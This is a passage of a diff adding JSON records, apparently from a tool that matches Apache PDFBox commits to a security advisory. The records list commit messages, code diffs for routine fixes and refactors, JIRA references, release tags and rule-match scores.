org.apache.pdfbox.pdmodel.common.PDRectangle;", + "+import org.apache.pdfbox.pdmodel.font.PDFont;", + "+import org.apache.pdfbox.pdmodel.font.PDType1Font;", + " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", + "@@ -39,2 +42,5 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderEffectDictionary", + " import static org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAbstractAppearanceHandler.SHORT_STYLES;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.AppearanceStyle;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainTextFormatter;", + " import org.apache.pdfbox.util.Matrix;", + "@@ -193,2 +199,31 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + "+ // somewhat inspired by AppearanceGeneratorHelper.insertGeneratedAppearance()", + "+ cs.beginText();", + "+ PDFont font = PDType1Font.HELVETICA;", + "+ int factor = 1;", + "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", + "+ {", + "+ factor = 2;", + "+ }", + "+ float fontSize = extractFontSize(annotation);", + "+ cs.setFont(font, fontSize);", + "+ cs.setNonStrokingColor(strokingColor);", + "+ AppearanceStyle appearanceStyle = new AppearanceStyle();", + "+ appearanceStyle.setFont(font);", + "+ appearanceStyle.setFontSize(fontSize);", + "+ PlainTextFormatter formatter = new PlainTextFormatter.Builder(cs)", + "+ .style(appearanceStyle)", + "+ .text(new PlainText(annotation.getContents()))", + "+ .width(getRectangle().getWidth())", + "+ .wrapLines(true)", + "+ //TODO some reverse engineering needed to find out padding", + "+ //TODO fat cloudy rectangle in CTAN file has \"the\" incomplete", + "+ .initialOffset(getRectangle().getLowerLeftX() + fontSize / 2 * factor, ", + "+ getRectangle().getUpperRightY() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor)", + "+ // Adobe ignores the /Q", + "+ //.textAlign(annotation.getQ())", + "+ .build();", + "+ formatter.format();", + "+ cs.endText();", + "+", + "@@ -302,2 +337,56 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + "+ //TODO extractNonStrokingColor and extractFontSize", + "+ // might somehow be replaced with PDDefaultAppearanceString,", + "+ // which is quite similar.", + "+ private float extractFontSize(PDAnnotationFreeText annotation)", + "+ {", + "+ String defaultAppearance = annotation.getDefaultAppearance();", + "+ if (defaultAppearance == null)", + "+ {", + "+ return 10;", + "+ }", + "+", + "+ try", + "+ {", + "+ // not sure if charset is correct, but we only need numbers and simple characters", + "+ PDFStreamParser parser = new PDFStreamParser(defaultAppearance.getBytes(Charsets.US_ASCII));", + "+ COSArray arguments = new COSArray();", + "+ COSArray fontArguments = new COSArray();", + "+ for (Object token = parser.parseNextToken(); token != null; token = parser.parseNextToken())", + "+ {", + "+ if (token instanceof COSObject)", + "+ {", + "+ arguments.add(((COSObject) token).getObject());", + "+ }", + "+ else if (token instanceof Operator)", + "+ {", + "+ Operator op = (Operator) token;", + "+ String name = op.getName();", + "+ if (\"Tf\".equals(name))", + "+ {", + "+ fontArguments = arguments;", + "+ }", + "+ arguments = new COSArray();", + "+ }", + "+ else", + "+ {", + "+ arguments.add((COSBase) token);", + "+ }", + "+ }", + "+ if (fontArguments.size() >= 2)", + "+ {", + "+ COSBase base = fontArguments.get(1);", + "+ if (base instanceof COSNumber)", + "+ {", + "+ return ((COSNumber) base).floatValue();", + "+ }", + "+ }", + "+ }", + "+ catch (IOException ex)", + "+ {", + "+ LOG.warn(\"Problem parsing /DA, will use default 10\", ex);", + "+ }", + "+ return 10;", + "+ }", + "+", + " @Override" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "24c8bd833ccec0a4feb5c4645d2ad5ee2e784998", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527704530, + "hunks": 2, + "message": "PDFBOX-3280: improve javadoc, ordinary users should not use this class, see https://stackoverflow.com/questions/50593597/pdfbox-clone-font git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832560 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java", + "index 0b5cb7c67..45a928daa 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java", + "@@ -36,3 +36,6 @@ import org.apache.pdfbox.pdmodel.common.COSObjectable;", + " * Utility class used to clone PDF objects. It keeps track of objects it has already cloned.", + "- *", + "+ * Although this class is public, it is for PDFBox internal use and should not be used outside,", + "+ * except by very experienced users. The \"public\" modifier will be removed in 3.0. The class should", + "+ * not be used on documents that are being generated because these can contain unfinished parts,", + "+ * e.g. font subsetting information.", + " */", + "@@ -40,3 +43,2 @@ public class PDFCloneUtility", + " {", + "-", + " private final PDDocument destination;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3280": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3280", + "relevance": 2 + } + ] + }, + { + "commit_id": "ad61615fd336723169a940ea1eec5955f3d43cde", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524864115, + "hunks": 1, + "message": "PDFBOX-4189: One GsubWorker per font, by Palash Ray git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830399 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "index 0d47e73bd..bc0743854 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "@@ -349,3 +349,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + "- GsubWorker gsubWorker = gsubWorkers.get(font.getName());", + "+ GsubWorker gsubWorker = gsubWorkers.get(font);", + " if (gsubWorker != null)" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "4de57b625d7261be418132e9cde3ec5c9a5949c3" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "8917378c09e741d1876e61362470acd095296eb3", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524505169, + "hunks": 3, + "message": "PDFBOX-4200: catch IOException if ICC profile cannot be read and use alternate colorspace git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829910 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDICCBased.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDICCBased.java", + "index f769135a6..cadae346d 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDICCBased.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDICCBased.java", + "@@ -159,25 +159,20 @@ public final class PDICCBased extends PDCIEBasedColorSpace", + " }", + "- catch (RuntimeException e)", + "+ catch (ProfileDataException | CMMException | IllegalArgumentException |", + "+ ArrayIndexOutOfBoundsException | IOException e)", + " {", + "- if (e instanceof ProfileDataException ||", + "- e instanceof CMMException ||", + "- e instanceof IllegalArgumentException ||", + "- e instanceof ArrayIndexOutOfBoundsException)", + "- {", + "- // fall back to alternateColorSpace color space", + "- awtColorSpace = null;", + "- alternateColorSpace = getAlternateColorSpace();", + "- if (alternateColorSpace.equals(PDDeviceRGB.INSTANCE))", + "- {", + "- isRGB = true;", + "- }", + "- LOG.warn(\"Can't read embedded ICC profile (\" + e.getLocalizedMessage() + ", + "- \"), using alternate color space: \" + alternateColorSpace.getName());", + "- initialColor = alternateColorSpace.getInitialColor();", + "- }", + "- else", + "- {", + "- throw e;", + "- }", + "+ fallbackToAlternateColorSpace(e);", + "+ }", + "+ }", + "+", + "+ private void fallbackToAlternateColorSpace(Exception e) throws IOException", + "+ {", + "+ awtColorSpace = null;", + "+ alternateColorSpace = getAlternateColorSpace();", + "+ if (alternateColorSpace.equals(PDDeviceRGB.INSTANCE))", + "+ {", + "+ isRGB = true;", + " }", + "+ LOG.warn(\"Can't read embedded ICC profile (\" + e.getLocalizedMessage() +", + "+ \"), using alternate color space: \" + alternateColorSpace.getName());", + "+ initialColor = alternateColorSpace.getInitialColor();", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDICCBased.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4200": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "7aef2dcd4b421210c2e6d8fab901e036eb59c229" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: file", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4200", + "relevance": 2 + } + ] + }, + { + "commit_id": "68a685b8bae74779d096c3f25395f987f6053806", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531638679, + "hunks": 1, + "message": "PDFBOX-4071: use correct type git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835946 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java", + "index 81dd09725..cd228e9ff 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java", + "@@ -250,3 +250,3 @@ public class PDPageLabels implements COSObjectable", + " {", + "- return new TreeSet(labels.keySet());", + "+ return new TreeSet<>(labels.keySet());", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "87992da00da8be052b3547678202d1bed8b94d08" + ], + [ + "no-tag", + "95f78fd8cea488ec1ce24c0e5ff0778c4c7f5e2f" + ], + [ + "no-tag", + "9f7901252289e3c4b8c20a23d6c14a9fd90f4cb0" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "7994005652433cf5139ec1827b62ce8686fd0f58", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530977713, + "hunks": 6, + "message": "PDFBOX-4068: change deprecation message because we're currently not intending to remove these methods, as suggested by Michael Klink git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1835316 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "index f9998e197..97e9d6448 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "@@ -2304,3 +2304,3 @@ public final class PDPageContentStream implements Closeable", + " * @throws IOException If an error occurs while writing to the stream.", + "- * @deprecated This method will be removed in a future release.", + "+ * @deprecated Usage of this method is discouraged.", + " */", + "@@ -2317,3 +2317,3 @@ public final class PDPageContentStream implements Closeable", + " * @throws IOException If an error occurs while writing to the stream.", + "- * @deprecated This method will be removed in a future release.", + "+ * @deprecated Usage of this method is discouraged.", + " */", + "@@ -2330,3 +2330,3 @@ public final class PDPageContentStream implements Closeable", + " * @throws IOException If an error occurs while writing to the stream.", + "- * @deprecated This method will be removed in a future release.", + "+ * @deprecated Usage of this method is discouraged.", + " */", + "@@ -2343,3 +2343,3 @@ public final class PDPageContentStream implements Closeable", + " * @throws IOException If an error occurs while writing to the stream.", + "- * @deprecated This method will be removed in a future release.", + "+ * @deprecated Usage of this method is discouraged.", + " */", + "@@ -2356,3 +2356,3 @@ public final class PDPageContentStream implements Closeable", + " * @throws IOException If an error occurs while writing to the stream.", + "- * @deprecated This method will be removed in a future release.", + "+ * @deprecated Usage of this method is discouraged.", + " */", + "@@ -2369,3 +2369,3 @@ public final class PDPageContentStream implements Closeable", + " * @throws IOException If an error occurs while writing to the stream.", + "- * @deprecated This method will be removed in a future release.", + "+ * @deprecated Usage of this method is discouraged.", + " */" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4068": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "0814ebc28b001fca71fc3b76fd67a407383e28f8" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4068", + "relevance": 2 + } + ] + }, + { + "commit_id": "43057ddae3110246ac6356cda22d74599fffe9a6", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525003919, + "hunks": 1, + "message": "PDFBOX-4193: avoid NPE git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1830508 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/ui/PageEntry.java b/debugger/src/main/java/org/apache/pdfbox/debugger/ui/PageEntry.java", + "index ba8e5234a..ff505eab4 100644", + "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/ui/PageEntry.java", + "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/ui/PageEntry.java", + "@@ -67,2 +67,6 @@ public class PageEntry", + " COSArray kids = (COSArray)parent.getDictionaryObject(COSName.KIDS);", + "+ if (kids == null)", + "+ {", + "+ return \"\";", + "+ }", + " int idx = kids.indexOfObject(node);" + ], + "changed_files": [ + "debugger/src/main/java/org/apache/pdfbox/debugger/ui/PageEntry.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4193": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "63b2a4d30a6d22a023399a21dd49b129086bb14f" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4193", + "relevance": 2 + } + ] + }, + { + "commit_id": "0a5646fd667580075958fc7cfb9a1f62c6023583", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531337138, + "hunks": 16, + "message": "PDFBOX-4260: support scratch file buffer instead of byte array output stream, by Jesse Long git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835665 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java b/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java", + "index 14b18ba97..ff72d1c1c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java", + "@@ -19,6 +19,5 @@ package org.apache.pdfbox.cos;", + "-import java.io.ByteArrayInputStream;", + "-import java.io.ByteArrayOutputStream;", + " import java.io.FilterOutputStream;", + " import java.io.IOException;", + "+import java.io.InputStream;", + " import java.io.OutputStream;", + "@@ -26,2 +25,5 @@ import java.util.List;", + " import org.apache.pdfbox.filter.Filter;", + "+import org.apache.pdfbox.io.RandomAccess;", + "+import org.apache.pdfbox.io.RandomAccessInputStream;", + "+import org.apache.pdfbox.io.RandomAccessOutputStream;", + " import org.apache.pdfbox.io.ScratchFile;", + "@@ -37,5 +39,5 @@ public final class COSOutputStream extends FilterOutputStream", + " private final COSDictionary parameters;", + "- // todo: this is an in-memory buffer, should use scratch file (if any) instead", + "- private ByteArrayOutputStream buffer = new ByteArrayOutputStream();", + "- ", + "+ private final ScratchFile scratchFile;", + "+ private RandomAccess buffer;", + "+", + " /**", + "@@ -46,6 +48,8 @@ public final class COSOutputStream extends FilterOutputStream", + " * @param output Encoded stream.", + "- * @param scratchFile Scratch file to use, or null.", + "+ * @param scratchFile Scratch file to use.", + "+ * ", + "+ * @throws IOException If there was an error creating a temporary buffer", + " */", + " COSOutputStream(List filters, COSDictionary parameters, OutputStream output,", + "- ScratchFile scratchFile)", + "+ ScratchFile scratchFile) throws IOException", + " {", + "@@ -54,2 +58,12 @@ public final class COSOutputStream extends FilterOutputStream", + " this.parameters = parameters;", + "+ this.scratchFile = scratchFile;", + "+", + "+ if (filters.isEmpty())", + "+ {", + "+ this.buffer = null;", + "+ }", + "+ else", + "+ {", + "+ this.buffer = scratchFile.createBuffer();", + "+ }", + " }", + "@@ -59,3 +73,10 @@ public final class COSOutputStream extends FilterOutputStream", + " {", + "- buffer.write(b);", + "+ if (buffer != null)", + "+ {", + "+ buffer.write(b);", + "+ }", + "+ else", + "+ {", + "+ super.write(b);", + "+ }", + " }", + "@@ -65,3 +86,10 @@ public final class COSOutputStream extends FilterOutputStream", + " {", + "- buffer.write(b, off, len);", + "+ if (buffer != null)", + "+ {", + "+ buffer.write(b, off, len);", + "+ }", + "+ else", + "+ {", + "+ super.write(b, off, len);", + "+ }", + " }", + "@@ -71,3 +99,10 @@ public final class COSOutputStream extends FilterOutputStream", + " {", + "- buffer.write(b);", + "+ if (buffer != null)", + "+ {", + "+ buffer.write(b);", + "+ }", + "+ else", + "+ {", + "+ super.write(b);", + "+ }", + " }", + "@@ -78,3 +113,3 @@ public final class COSOutputStream extends FilterOutputStream", + " }", + "- ", + "+", + " @Override", + "@@ -82,18 +117,54 @@ public final class COSOutputStream extends FilterOutputStream", + " {", + "- if (buffer == null)", + "+ try", + " {", + "- return;", + "+ if (buffer != null)", + "+ {", + "+ try", + "+ {", + "+ // apply filters in reverse order", + "+ for (int i = filters.size() - 1; i >= 0; i--)", + "+ {", + "+ try (InputStream unfilteredIn = new RandomAccessInputStream(buffer))", + "+ {", + "+ if (i == 0)", + "+ {", + "+ /*", + "+ * The last filter to run can encode directly to the enclosed output", + "+ * stream.", + "+ */", + "+ filters.get(i).encode(unfilteredIn, out, parameters, i);", + "+ }", + "+ else", + "+ {", + "+ RandomAccess filteredBuffer = scratchFile.createBuffer();", + "+ try", + "+ {", + "+ try (OutputStream filteredOut = new RandomAccessOutputStream(filteredBuffer))", + "+ {", + "+ filters.get(i).encode(unfilteredIn, filteredOut, parameters, i);", + "+ }", + "+", + "+ RandomAccess tmpSwap = filteredBuffer;", + "+ filteredBuffer = buffer;", + "+ buffer = tmpSwap;", + "+ }", + "+ finally", + "+ {", + "+ filteredBuffer.close();", + "+ }", + "+ }", + "+ }", + "+ }", + "+ }", + "+ finally", + "+ {", + "+ buffer.close();", + "+ buffer = null;", + "+ }", + "+ }", + " }", + "- // apply filters in reverse order", + "- for (int i = filters.size() - 1; i >= 0; i--)", + "+ finally", + " {", + "- // todo: this is an in-memory buffer, should use scratch file (if any) instead", + "- ByteArrayInputStream input = new ByteArrayInputStream(buffer.toByteArray());", + "- buffer = new ByteArrayOutputStream();", + "- filters.get(i).encode(input, buffer, parameters, i);", + "+ super.close();", + " }", + "- // flush the entire stream", + "- buffer.writeTo(out);", + "- super.close();", + "- buffer = null;", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4260": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "1d69f40375c8dfef4bd3e0de4f7d39df15d18845" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: file", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4260", + "relevance": 2 + } + ] + }, + { + "commit_id": "a2dba1ca3490d764a20d98e3dda2d78ca275e32f", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532979884, + "hunks": 2, + "message": "PDFBOX-4071: final modifier not needed for private method git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1837085 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/COSParser.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/COSParser.java", + "index 4571b5e8d..5b501d10f 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/COSParser.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/COSParser.java", + "@@ -457,3 +457,3 @@ public class COSParser extends BaseParser", + " */", + "- private final long getStartxrefOffset() throws IOException", + "+ private long getStartxrefOffset() throws IOException", + " {", + "@@ -2152,3 +2152,3 @@ public class COSParser extends BaseParser", + " */", + "- private final COSDictionary rebuildTrailer() throws IOException", + "+ private COSDictionary rebuildTrailer() throws IOException", + " {" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdfparser/COSParser.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: parse", + "relevance": 4 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "edfb9dd8e1e653ca124324c9c9e5473fba121d05", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524335690, + "hunks": 1, + "message": "PDFBOX-4189: pass change missed in last commit git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829738 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "index de27a5f4c..50be140c1 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "@@ -361,3 +361,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + "- COSWriter.writeString(font.encode(text), getOutputStream());", + "+ COSWriter.writeString(encodedText, getOutputStream());", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "ac862727d9b2da1e9ee5a64cbd66768ccaf9b1d2", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525930039, + "hunks": 19, + "message": "PDFBOX-4068: refactor: outputStream is only ever set within constructors, make it a constructor parameter git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831304 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "index 0d3eb8ca2..9aa76857b 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "@@ -57,3 +57,3 @@ abstract class PDAbstractContentStream implements Closeable", + " {", + "- private OutputStream outputStream;", + "+ protected final OutputStream outputStream;", + " private PDResources resources;", + "@@ -70,12 +70,2 @@ abstract class PDAbstractContentStream implements Closeable", + "- /**", + "- * Create a new appearance stream.", + "- *", + "- */", + "- public PDAbstractContentStream()", + "- {", + "- formatDecimal.setMaximumFractionDigits(4);", + "- formatDecimal.setGroupingUsed(false);", + "- }", + "-", + " /**", + "@@ -85,3 +75,3 @@ abstract class PDAbstractContentStream implements Closeable", + " */", + "- public PDAbstractContentStream(OutputStream outputStream)", + "+ PDAbstractContentStream(OutputStream outputStream)", + " {", + "@@ -105,12 +95,2 @@ abstract class PDAbstractContentStream implements Closeable", + "- public OutputStream getOutputStream()", + "- {", + "- return outputStream;", + "- }", + "-", + "- public void setOutputStream(OutputStream outputStream)", + "- {", + "- this.outputStream = outputStream;", + "- }", + 